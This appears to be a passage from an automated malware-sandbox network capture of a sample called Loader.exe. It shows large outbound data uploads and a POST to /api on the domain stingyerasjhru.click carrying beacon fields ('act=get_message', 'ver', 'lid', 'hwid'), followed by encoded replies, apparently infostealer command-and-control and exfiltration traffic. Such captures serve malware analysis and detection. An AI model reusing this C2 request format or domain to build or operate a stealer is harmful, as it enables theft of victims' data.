                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: b4 02 27 3a bd 5b b2 96 d5 6c 7f fd 43 59 6c b5 3c f5 d8 41 9d bd d4 b8 ee 95 fa ac ce b5 a8 9b dc 18 bf ab 00 24 fe ea aa ef 42 0c 5c 62 6f a1 2e fc 4f 74 87 f2 d7 e3 2f f4 39 00 01 71 02 bf 86 cd 15 1e 71 c5 20 b5 67 cf 83 26 00 34 46 af 9f 73 5f 20 c6 03 52 76 36 d3 b0 f4 52 81 df 1c 49 be ed e4 83 1e 15 af 34 7d d0 29 a4 8c 5e f2 9f 0e 48 44 3d 6c 06 7c ef eb 8c e9 91 ca da 5e 30 3d 3a 17 18 31 98 50 17 f1 8a b9 f0 4c b1 f4 63 95 4c 7f b2 c5 35 17 00 63 df fa 34 ab 35 16 30 b1 6f 76 05 91 ab 9d 8a 6a 0c 1e ba fd d9 8f d8 80 41 11 09 b6 8e c2 d6 51 a7 82 40 78 50 47 4a e8 6b f1 3d d8 97 e2 39 18 3d 30 ee 73 4f ee 9d ba 3e 95 b1 12 dc 5f 83 9a 26 e5 ad 15 37 fa 7b 9d 90 37 02 32 0d d0 0e d9 9e 47 2a c2 bb c1 a3 66 c9 0e db 2e 8c 8d 37 9e 55 a1 cf 49 59
                                                                                                              Data Ascii: ':[lCYl<A$B\bo.Ot/9qq g&4Fs_ Rv6RI4})^HD=l|^0=:1PLcL5c450ovjAQ@xPGJk=9=0sO>_&7{72G*f.7UIY
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 32 77 e1 a9 d2 ce 34 35 b8 dc f0 0c 6e 5f bc c4 d8 53 30 6d 45 f3 2d df 37 23 5f 93 c0 c8 01 16 0a 9b 2b f7 9e c9 ce e2 85 71 29 a0 d1 88 95 00 d7 a8 8e 36 c9 4e a5 fa cd 0c 0d 86 f2 9e 40 40 84 f7 54 1a 94 cd ac f0 01 6e 56 5f a4 25 b7 4e 62 0c 0b c5 a1 ce b3 ba 0b 29 6e 3e 08 08 6b cd e9 f7 80 99 0f e5 38 96 39 be c5 36 0a 2e 96 60 48 bd fd 21 4f f3 4d 54 4b 1f 38 9e f7 7a 72 c5 4c 10 f1 1f 10 0d d8 1d d9 4d f7 94 ad 1f 1c dc 5e 9e 1e 5c fd 38 62 5b fe c8 0e 43 57 28 e7 fe 1d 03 9b 4e 48 89 71 2f f0 c2 4f 82 e3 39 00 2b b2 c8 ad f0 4c b8 3e b7 8a 24 54 73 f7 88 16 b7 63 9b 49 49 1a bb 0d 75 05 b1 e2 05 09 1a 79 7e 50 1b 92 1a 0a c3 d9 ae b5 c9 a6 46 71 ef 22 4e 62 89 15 a0 5a 91 7a ee 8a 67 cc ea dc 90 69 ff 90 c8 03 c7 d6 f4 84 cc ec f9 97 b4 02 9c 69
                                                                                                              Data Ascii: 2w45n_S0mE-7#_+q)6N@@TnV_%Nb)n>k896.`H!OMTK8zrLM^\8b[CW(NHq/O9+L>$TscIIuy~PFq"NbZzgii
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 53 d4 63 cb 71 27 d4 1c ca 89 03 54 af 75 71 dc 8d 59 b9 5a b6 b0 c5 db 6d 4f 1b 40 e2 90 20 1c ed b4 3d 6e 58 85 7f 59 10 93 a6 51 41 ef 18 f0 12 85 84 f7 7c ab 5e c8 d8 bc 72 57 a4 58 b6 4c ae eb c2 f0 ed 2f c3 ec ed b7 df 43 6c 9a 49 8a 94 d5 30 c2 f2 80 7f 5d 45 48 9f bd 52 17 6c c3 7a 16 f5 f5 ea d8 df 32 d1 ed 21 d0 d5 b7 bb cd 52 4e 19 a8 5e 9a 0b a8 29 c9 43 b6 63 f0 ae f2 14 fa b2 3b b4 43 56 21 e9 eb cf 93 d5 2e af 07 e0 29 d6 19 1a 25 a9 c6 83 a6 25 3f 2c 42 df 8e 42 77 05 5f 1b 37 bd f6 c0 d1 32 0b e2 f7 ed 76 6e e6 b6 46 d7 d8 8a 0b 5a 43 04 b5 da b0 f8 1d f4 2b b8 cf b1 82 8e 05 fa 35 59 83 af 07 cc 3f 8c da 8d a0 b3 74 af c3 71 be 59 3a 72 dd d0 2d 8b 19 db 77 74 a7 41 8b 87 93 d8 fc a2 9c a6 c6 6a 7b b0 da e7 90 ab ba be 7f 2d 15 76 e8 59
                                                                                                              Data Ascii: Scq'TuqYZmO@ =nXYQA|^rWXL/ClI0]EHRlz2!RN^)Cc;CV!.)%%?,BBw_72vnFZC+5Y?tqY:r-wtAj{-vY
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 6e 67 52 1d f0 a2 46 25 34 d0 3c 58 a4 64 f7 75 dd fc 36 46 98 e8 eb 95 43 ae d4 0b 2e b8 a2 52 ba 7e 5d ef 12 fa d0 59 3a f8 ce e3 40 41 96 36 90 51 4f 9b de 95 05 f2 87 0c 8f 06 98 24 f7 b8 bb 34 4d 76 ee 5c 31 0c 9c dd b0 ee d2 a8 b3 46 b6 59 8c 50 c0 1e a6 58 3b ab 73 b0 a4 79 b0 8d 9a 2e 1a c7 b9 d7 87 d1 59 50 25 d6 d7 35 fe cc d9 c7 8a 93 91 84 7a e0 16 ab e4 ba 7e b6 cc 89 89 85 8e f7 5e e7 83 42 a1 a8 e1 32 3a 47 4f 2c 56 e6 04 43 9b 49 b8 66 39 57 b9 61 41 27 1b 2a 6c 38 dd 47 e0 8b 80 94 08 53 6c 9a 87 24 a3 24 b3 3e 74 ef 1e fd f0 d1 62 1c c3 e8 ee b1 37 69 7a 26 4e f9 81 d8 13 07 b6 c5 1f 42 e9 60 56 b3 9c 2f f8 3a 94 2c 76 1d 5a 12 37 34 f8 34 a3 4b 70 db 28 56 0f 8b d8 c8 4c cd f4 15 bb d6 58 e9 f0 9a 75 f8 fe 2a 4d e0 3b 3f 02 58 ed 83 e5
                                                                                                              Data Ascii: ngRF%4<Xdu6FC.R~]Y:@A6QO$4Mv\1FYPX;sy.YP%5z~^B2:GO,VCIf9WaA'*l8GSl$$>tb7iz&NB`V/:,vZ744Kp(VLXu*M;?X
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 10 41 21 7f 01 0c 29 41 04 5d ce f9 b9 5c 6e e1 76 4e a6 3c 4b 49 b2 d8 81 bc 92 82 82 d2 da 7b b4 92 84 3e 1f bf 59 83 27 08 4a 64 81 ae 7c ab 96 87 25 f1 32 27 c0 82 bc f2 0e fe ea a4 f7 02 be 56 2c 2a ac ee c7 d7 05 15 93 a4 79 d1 ce 30 d4 1c 26 2b 7b 81 e5 12 76 4d 12 f5 14 57 c1 0b bb b4 e2 0c d4 0e e7 ce 6d 5a eb b6 1b af 8b cd ae cb fe 42 8f a3 35 4b 1e c2 56 87 64 93 54 04 94 6c 96 c8 8c 27 89 25 87 0c 89 3f 7f fa dc ab 03 13 cc 99 d1 15 16 3e c6 9b b2 14 5e 3d 61 b9 1e c1 4e f8 d6 38 e6 44 68 56 ac c1 df 00 23 8f 65 43 29 d3 7d 17 4d 70 e4 5a 38 cb f9 be 3b ed b4 a5 d1 b1 b7 21 a2 7a a8 df cf f2 bb 6e e2 ba 06 8f 6b c4 eb 5b 38 a6 68 72 6d 53 4a 4a 3f 37 0e 9a ec 3a 72 8a d0 8a a7 e6 47 e3 db 37 fd 55 2a c4 bc b1 a3 9b f3 b4 c5 54 7a b8 b7 4a cb
                                                                                                              Data Ascii: A!)A]\nvN<KI{>Y'Jd|%2'V,*y0&+{vMWmZB5KVdTl'%?>^=aN8DhV#eC)}MpZ8;!znk[8hrmSJJ?7:rG7U*TzJ
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 81 d2 bc 0e 0f 42 6f e6 a3 b4 47 27 c0 c1 17 29 e8 00 f9 aa c2 06 62 dc f4 93 fb fd 76 07 62 8d 81 ff 0c 01 ab 65 78 1d 19 5c e7 17 49 ff 88 ab 7f 4a 08 8d ef dc f8 db 9a e7 f8 f2 6f 97 f2 13 ca a2 85 5c 27 43 1a 98 8d f9 a6 18 7e 8a 19 05 43 66 36 3a e3 f3 92 47 87 e0 59 28 4a bc a1 78 65 63 43 a5 bc 2c 9b 9f 1f 35 a8 65 0f cb 86 be 6b a2 a2 b7 df 2e a8 d5 28 a2 e7 27 ec 48 4e 86 1d 1d 21 cf b9 cc 64 cf 2b ab 63 83 e6 16 e1 a5 e7 07 a4 e1 32 16 da 93 76 ed 79 27 33 25 a4 fc 69 72 29 a0 43 fb e5 de be 14 ff fe 27 65 f6 70 6a 2c 00 cb 24 34 7a 79 34 33 ec 38 64 b7 f6 64 1e 2c 13 da ad 90 26 fd 5b 4e 8e 2b 57 35 8f c4 7d c6 bf bd 4d 3a ea 3f d1 a8 ab a1 ec b8 bf 6d 74 bd cd 32 64 f8 86 5c f4 2f 7b a2 95 b3 25 13 ef 9c f1 4b c5 1d 97 e0 f5 78 ff 62 aa e3 cd
                                                                                                              Data Ascii: BoG')bvbex\IJo\'C~Cf6:GY(JxecC,5ek.('HN!d+c2vy'3%ir)C'epj,$4zy438dd,&[N+W5}M:?mt2d\/{%Kxb
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: c3 00 02 4f 12 b2 5f eb 17 c4 5f 9b b2 b2 19 98 e0 82 57 91 0d e9 7e 3a c5 b8 3b a5 49 47 97 70 d6 f4 27 0b 9a 37 96 e0 ce b1 d8 79 f0 4d ed 17 ec 83 22 ad 97 d9 17 7c 0f 54 8d fb 22 72 80 66 12 da 0a 08 37 ae f1 bd 76 d3 42 fa 9d c5 24 5b 60 bb b9 7c f2 4f cf 85 6c c9 cc be a1 ca b8 e4 58 59 aa 2f 04 bf 33 6f 33 f4 c7 52 ea bf db 3f 31 a2 ae 5c 70 db 03 9a 30 fb 6c 22 56 78 f0 c9 b0 7a 29 16 b4 b3 4d 42 53 6a b4 fb 0b 43 16 d8 bf cf 34 8f 49 c2 52 8b 39 d2 7f da 6c 7f bb 1e 10 f5 0e 68 64 fd a8 e4 e7 c0 34 8f b9 a3 93 cd 0b af 84 3b 0f 9a 86 be 8f 47 19 c2 f0 0f 2e a7 70 8a 95 39 ad 2b c3 01 95 0f cd 7d a3 52 80 b5 fe 63 75 c7 d0 df 5e 49 f4 eb 09 4d 1e 5b fd 0a 43 c6 0b d1 17 57 78 c6 9b 3e 2b 0c 85 de ad 00 30 7a b9 c6 fd f9 4c 48 f2 9e 98 16 69 39 c7
                                                                                                              Data Ascii: O__W~:;IGp'7yM"|T"rf7vB$[`|OlXY/3o3R?1\p0l"Vxz)MBSjC4IR9lhd4;G.p9+}Rcu^IM[CWx>+0zLHi9
                                                                                                              2024-12-31 16:42:40 UTC1150INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:40 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=kri60l2g2m35vhcuip4e834ne8; expires=Sat, 26 Apr 2025 10:29:17 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fKxf1SD%2Bxf%2FmJSCRNMxijlndPvO4UtZd7dlWFP1j%2FhNLG1UfkPKdLLD%2Ftloo1snVErViy9agCSAiljWYdGQGa1QNxwiQSLNbVbF%2BfuWEVEutrj7JtcoLbxRbf94fvzIC3HdzDwX4Xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb94978ab6de0-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=128891&min_rtt=128743&rtt_var=27399&sent=269&recv=856&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1083785&delivery_rate=29628&cwnd=252&unsent_bytes=0&cid=7239ad9765013f56&ts=4102&x=0"


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.11.2049762172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:40 UTC268OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 85
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:40 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d 26 68 77 69 64 3d 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33
                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=&hwid=503360CAB129FD4CDB71E32F12885CB3
                                                                                                              2024-12-31 16:42:41 UTC1135INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:41 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=m0r7a79s7f7gbjusuobsm9v1ul; expires=Sat, 26 Apr 2025 10:29:20 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=42caeh%2BSbeyJbYYvEkWhSA%2Be47vsAE22AKws3Ew2WHy4ldiyemFy5BOnVJJAdnUKSUszaC1tE9PLl1bcTeTPj3VDJ9EdrV1AKyuEiYjfKzSGMxLgvEVQShDmP0bkOVTuRIGHJqVWFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb9660dc58e02-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=129433&min_rtt=129405&rtt_var=27349&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=989&delivery_rate=29565&cwnd=250&unsent_bytes=0&cid=50eba1109be9f34c&ts=684&x=0"
                                                                                                              2024-12-31 16:42:41 UTC234INData Raw: 33 36 61 63 0d 0a 59 68 61 32 4c 74 55 78 65 31 4b 42 53 69 69 59 79 79 2f 55 68 62 4f 71 52 71 6b 4b 52 33 34 37 67 49 34 77 68 74 65 6e 48 42 67 35 62 5a 52 49 6f 52 4e 42 59 36 31 6f 54 62 72 78 48 76 69 6e 31 34 68 38 69 32 6b 4f 4f 32 36 35 30 68 2f 6a 75 35 4a 5a 62 77 56 34 30 6b 47 36 56 30 74 69 39 69 5a 66 37 5a 4a 41 6e 73 50 2b 6b 77 6a 2b 52 53 30 78 51 2b 48 6c 5a 74 79 79 34 33 68 52 57 79 53 45 56 4f 59 49 43 67 72 71 48 6d 76 4c 72 78 32 39 37 65 2b 46 45 76 31 4a 48 7a 30 4f 36 65 6c 62 30 36 32 58 4c 55 46 56 57 34 46 6f 70 47 4d 74 50 72 55 45 47 50 61 49 62 5a 4c 56 31 5a 6b 32 7a 46 67 4b 4e 33 47 7a 37 33 76 4f 37 75 6c 52 55 67 46 61 32 32 57 57 59 79 38 43 31 52 78 43
                                                                                                              Data Ascii: 36acYha2LtUxe1KBSiiYyy/UhbOqRqkKR347gI4whtenHBg5bZRIoRNBY61oTbrxHvin14h8i2kOO2650h/ju5JZbwV40kG6V0ti9iZf7ZJAnsP+kwj+RS0xQ+HlZtyy43hRWySEVOYICgrqHmvLrx297e+FEv1JHz0O6elb062XLUFVW4FopGMtPrUEGPaIbZLV1Zk2zFgKN3Gz73vO7ulRUgFa22WWYy8C1RxC
                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 39 37 46 63 67 2f 58 32 33 78 37 4f 4f 52 51 59 53 37 62 37 47 2b 43 30 39 53 74 42 4a 31 54 38 53 71 46 61 43 44 2f 35 49 58 53 33 2b 57 4f 6d 34 76 7a 76 62 63 51 39 43 30 59 4d 32 63 67 47 76 72 33 45 61 30 46 56 4a 76 4e 42 6a 56 41 6f 59 37 67 76 65 74 47 73 61 2b 54 78 38 73 31 78 36 47 63 49 54 57 48 32 36 48 57 2f 6b 4f 74 4e 4b 54 73 68 31 56 2b 44 51 43 6b 56 37 58 4a 69 71 4b 42 37 70 4f 50 35 37 6e 58 5a 62 78 55 7a 63 73 71 39 55 63 32 64 6e 6c 4a 56 45 45 2f 33 51 37 51 48 4b 51 62 4f 48 6e 37 79 70 46 57 35 30 73 50 73 45 66 46 74 64 43 31 59 79 73 74 6c 76 34 75 49 65 53 6c 58 55 38 46 4a 75 31 55 55 50 65 64 36 47 4f 2b 6a 57 4b 48 4d 33 4f 41 41 35 44 4d 7a 4b 58 54 70 2b 30 6a 6e 76 50 46 47 66 53 5a 79 2f 42 79 79 59 79 39 68 75 48 78
                                                                                                              Data Ascii: 97Fcg/X23x7OORQYS7b7G+C09StBJ1T8SqFaCD/5IXS3+WOm4vzvbcQ9C0YM2cgGvr3Ea0FVJvNBjVAoY7gvetGsa+Tx8s1x6GcITWH26HW/kOtNKTsh1V+DQCkV7XJiqKB7pOP57nXZbxUzcsq9Uc2dnlJVEE/3Q7QHKQbOHn7ypFW50sPsEfFtdC1Yystlv4uIeSlXU8FJu1UUPed6GO+jWKHM3OAA5DMzKXTp+0jnvPFGfSZy/ByyYy9huHx
                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 4a 6a 6f 2b 4f 6b 55 2f 56 6f 54 4b 46 48 76 39 45 50 52 70 2b 46 4c 51 41 55 6c 35 55 32 63 64 43 35 72 33 57 56 4e 39 50 35 71 6f 2b 4c 64 7a 69 6e 47 62 48 64 4f 54 4f 7a 35 52 64 2b 34 37 56 70 56 57 31 6a 68 59 62 39 2b 41 7a 50 71 48 48 4c 39 6a 30 75 65 38 74 54 34 45 70 6f 7a 63 53 5a 51 31 4d 31 7a 34 75 58 4f 64 45 52 4e 51 75 4a 74 6a 58 4a 4f 4f 2b 59 68 66 65 4c 37 48 6f 32 7a 2f 70 30 41 32 46 67 52 45 67 2f 4f 76 6c 37 46 6c 65 46 4d 66 6c 46 6d 30 33 79 59 65 44 46 68 34 41 46 67 6f 59 56 69 6e 75 62 2f 78 77 33 71 57 42 4d 75 62 39 62 6b 58 2f 79 6b 38 47 78 65 4e 55 37 52 48 59 5a 53 4d 68 66 55 63 33 53 33 72 6b 50 68 77 4d 54 4e 4b 4d 31 6c 4b 42 67 4c 73 50 6c 63 38 61 4c 2b 63 31 49 6b 57 34 39 67 67 6e 34 52 48 66 6b 72 51 38 36 52
                                                                                                              Data Ascii: Jjo+OkU/VoTKFHv9EPRp+FLQAUl5U2cdC5r3WVN9P5qo+LdzinGbHdOTOz5Rd+47VpVW1jhYb9+AzPqHHL9j0ue8tT4EpozcSZQ1M1z4uXOdERNQuJtjXJOO+YhfeL7Ho2z/p0A2FgREg/Ovl7FleFMflFm03yYeDFh4AFgoYVinub/xw3qWBMub9bkX/yk8GxeNU7RHYZSMhfUc3S3rkPhwMTNKM1lKBgLsPlc8aL+c1IkW49ggn4RHfkrQ86R
                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 37 6c 4c 4f 42 41 64 42 39 78 75 4f 64 64 30 4c 2f 7a 61 79 67 44 4c 75 42 65 73 32 55 74 4f 4f 5a 79 65 74 36 75 66 49 4b 30 69 2f 4e 78 34 44 6c 77 44 48 6a 4e 39 47 4c 78 6b 73 35 75 59 51 51 69 30 57 32 43 66 43 64 39 79 41 39 2b 39 59 64 4c 6c 2b 62 56 2b 78 2f 6e 62 67 67 6b 62 63 57 38 64 2b 37 76 7a 69 38 68 46 56 33 43 42 5a 39 79 49 6a 48 58 49 78 44 2b 38 78 61 78 78 4d 44 59 43 50 35 6d 42 54 68 42 78 66 78 6f 38 2b 58 41 5a 55 41 6e 49 4f 42 62 67 6c 51 51 47 74 6b 77 62 73 71 6c 66 49 61 31 36 38 39 7a 37 57 55 33 48 56 65 78 75 6e 54 48 74 50 52 31 57 7a 46 76 2b 46 36 44 52 77 38 4b 34 69 52 68 7a 4c 74 39 6e 39 33 45 38 78 66 72 4d 6e 51 5a 64 4b 76 47 5a 73 71 51 31 55 78 2b 4b 48 2f 69 64 72 4a 39 4d 47 58 30 4c 56 33 33 70 47 61 52 39
                                                                                                              Data Ascii: 7lLOBAdB9xuOdd0L/zaygDLuBes2UtOOZyet6ufIK0i/Nx4DlwDHjN9GLxks5uYQQi0W2CfCd9yA9+9YdLl+bV+x/nbggkbcW8d+7vzi8hFV3CBZ9yIjHXIxD+8xaxxMDYCP5mBThBxfxo8+XAZUAnIOBbglQQGtkwbsqlfIa1689z7WU3HVexunTHtPR1WzFv+F6DRw8K4iRhzLt9n93E8xfrMnQZdKvGZsqQ1Ux+KH/idrJ9MGX0LV33pGaR9
                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 76 51 77 41 51 41 37 4c 45 61 73 43 75 38 69 6c 51 55 6d 62 6a 54 36 4e 67 4e 67 6a 4e 44 32 4c 37 71 58 50 37 37 59 54 51 45 75 45 68 44 51 39 55 36 4f 4a 58 7a 4f 4c 74 57 33 39 52 52 64 42 55 6a 47 59 51 43 73 73 6d 48 71 43 68 51 37 72 4c 33 4d 55 61 68 6b 4e 2f 42 33 7a 74 77 31 37 4e 67 63 56 4d 56 7a 34 35 37 6b 47 52 53 54 30 54 37 79 4a 2f 39 61 46 48 6d 76 7a 33 37 41 7a 67 62 43 73 38 56 65 66 66 64 4c 47 41 77 31 35 30 4d 33 6a 34 47 37 64 51 50 51 4c 4a 43 33 53 33 2b 52 32 6e 38 65 61 65 50 70 42 49 63 42 4a 63 39 4c 35 64 78 5a 6a 79 53 45 52 4e 49 76 4e 61 67 45 41 4c 42 66 51 38 52 73 69 36 65 49 54 39 2f 63 77 74 34 6b 6b 56 43 56 6e 6c 2f 6e 4b 2b 76 65 35 4a 63 52 64 48 32 55 69 63 52 51 49 77 35 68 38 52 78 4f 52 4d 74 63 33 2f 2b 69
                                                                                                              Data Ascii: vQwAQA7LEasCu8ilQUmbjT6NgNgjND2L7qXP77YTQEuEhDQ9U6OJXzOLtW39RRdBUjGYQCssmHqChQ7rL3MUahkN/B3ztw17NgcVMVz457kGRST0T7yJ/9aFHmvz37AzgbCs8VeffdLGAw150M3j4G7dQPQLJC3S3+R2n8eaePpBIcBJc9L5dxZjySERNIvNagEALBfQ8Rsi6eIT9/cwt4kkVCVnl/nK+ve5JcRdH2UicRQIw5h8RxORMtc3/+i
                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 4e 6e 6d 78 77 6d 6a 4f 6a 76 64 61 63 79 46 7a 68 32 57 6e 53 7a 63 4c 75 51 6b 5a 7a 36 4d 45 6a 4e 4c 57 6d 77 6e 5a 51 42 34 45 56 4d 66 33 53 76 2b 6c 6c 6b 59 70 57 32 50 4f 42 62 74 56 44 54 33 37 63 6e 6a 53 2f 6d 57 54 34 6f 44 35 41 4d 35 41 4b 45 31 72 31 2b 4a 52 31 5a 4c 4f 4b 6c 74 4a 5a 4e 46 47 75 58 51 4e 4f 50 45 54 55 4f 36 6f 58 72 2f 33 2f 4d 30 68 39 53 55 58 47 31 44 57 31 46 58 43 73 2b 35 4c 57 51 39 38 7a 6b 48 6a 5a 77 73 57 77 67 5a 48 31 50 31 35 72 74 79 42 37 67 66 2b 5a 41 59 50 56 38 58 30 41 4e 43 38 31 6c 31 74 4d 33 6a 2b 57 4b 5a 35 53 68 37 59 63 6d 75 6f 6d 31 75 74 33 39 62 63 63 4f 56 47 4b 78 6c 77 32 4c 64 2b 79 35 33 50 54 45 73 78 65 2f 42 50 68 55 51 71 4e 75 59 66 66 65 76 67 53 72 76 71 31 65 41 55 32 6c 4a
                                                                                                              Data Ascii: NnmxwmjOjvdacyFzh2WnSzcLuQkZz6MEjNLWmwnZQB4EVMf3Sv+llkYpW2POBbtVDT37cnjS/mWT4oD5AM5AKE1r1+JR1ZLOKltJZNFGuXQNOPETUO6oXr/3/M0h9SUXG1DW1FXCs+5LWQ98zkHjZwsWwgZH1P15rtyB7gf+ZAYPV8X0ANC81l1tM3j+WKZ5Sh7Ycmuom1ut39bccOVGKxlw2Ld+y53PTEsxe/BPhUQqNuYffevgSrvq1eAU2lJ
                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 39 5a 5a 37 6f 75 49 53 45 77 68 54 74 52 38 6f 56 42 49 46 75 73 46 47 76 4b 6c 54 75 50 78 33 2f 49 51 37 57 4d 4f 50 33 72 57 2b 46 37 53 6b 50 56 72 4c 43 68 2f 2b 68 71 66 56 44 41 61 75 41 52 6c 30 71 39 62 6b 37 54 65 77 77 6e 6d 50 53 59 78 57 4d 7a 37 41 74 43 7a 38 6c 4e 52 42 58 54 30 65 59 6b 65 51 67 36 75 46 67 66 35 70 78 71 58 36 73 58 4e 4b 70 31 6c 49 55 34 4c 39 2b 49 45 35 49 43 53 58 6d 38 78 4c 39 73 46 6f 31 73 30 4b 75 41 76 52 4b 47 5a 61 71 44 4a 79 66 73 75 79 44 4d 67 56 57 65 76 2f 42 76 2b 70 50 5a 6f 66 51 46 4d 7a 46 33 6e 56 42 34 4b 32 44 35 30 74 37 31 67 68 39 50 64 35 52 48 48 4f 6e 38 74 53 74 4c 71 42 62 36 68 36 54 64 50 56 6c 2f 46 65 71 4d 42 43 68 36 31 41 45 33 54 67 78 61 61 79 50 6e 50 44 2f 4d 79 50 52 4a 70
                                                                                                              Data Ascii: 9ZZ7ouISEwhTtR8oVBIFusFGvKlTuPx3/IQ7WMOP3rW+F7SkPVrLCh/+hqfVDAauARl0q9bk7TewwnmPSYxWMz7AtCz8lNRBXT0eYkeQg6uFgf5pxqX6sXNKp1lIU4L9+IE5ICSXm8xL9sFo1s0KuAvRKGZaqDJyfsuyDMgVWev/Bv+pPZofQFMzF3nVB4K2D50t71gh9Pd5RHHOn8tStLqBb6h6TdPVl/FeqMBCh61AE3TgxaayPnPD/MyPRJp
                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 65 45 30 45 34 73 44 69 62 64 59 62 31 56 50 6a 7a 79 4d 68 72 68 2f 6e 50 37 39 50 37 6d 4a 2f 74 4c 4a 43 59 4d 2b 62 5a 42 79 75 43 51 53 53 67 4c 57 34 46 6f 75 6c 49 75 50 73 42 36 61 66 62 7a 5a 36 62 5a 6e 4d 78 31 32 56 30 41 4f 48 66 34 34 6d 62 4e 6a 35 35 53 62 67 42 6c 38 42 2b 47 52 79 30 7a 7a 69 4a 78 36 36 52 38 76 72 66 6b 77 68 58 38 55 33 39 48 57 4d 6e 4c 5a 62 57 39 34 6e 46 66 44 6d 48 41 5a 71 38 46 46 44 53 78 65 6d 72 4d 67 6b 65 38 39 76 7a 6b 50 4d 39 59 66 7a 5a 70 73 71 55 46 33 37 4f 4d 57 7a 4d 46 5a 76 52 39 6e 58 6f 70 4f 65 49 46 61 38 47 69 42 4a 66 64 32 73 49 61 68 6c 34 54 50 57 50 43 78 31 72 74 75 65 73 76 4c 78 70 62 78 32 71 64 56 52 63 44 38 53 64 4f 33 72 73 61 2f 37 48 4c 39 6d 6e 42 63 43 77 62 62 63 33 48 63
                                                                                                              Data Ascii: eE0E4sDibdYb1VPjzyMhrh/nP79P7mJ/tLJCYM+bZByuCQSSgLW4FoulIuPsB6afbzZ6bZnMx12V0AOHf44mbNj55SbgBl8B+GRy0zziJx66R8vrfkwhX8U39HWMnLZbW94nFfDmHAZq8FFDSxemrMgke89vzkPM9YfzZpsqUF37OMWzMFZvR9nXopOeIFa8GiBJfd2sIahl4TPWPCx1rtuesvLxpbx2qdVRcD8SdO3rsa/7HL9mnBcCwbbc3Hc
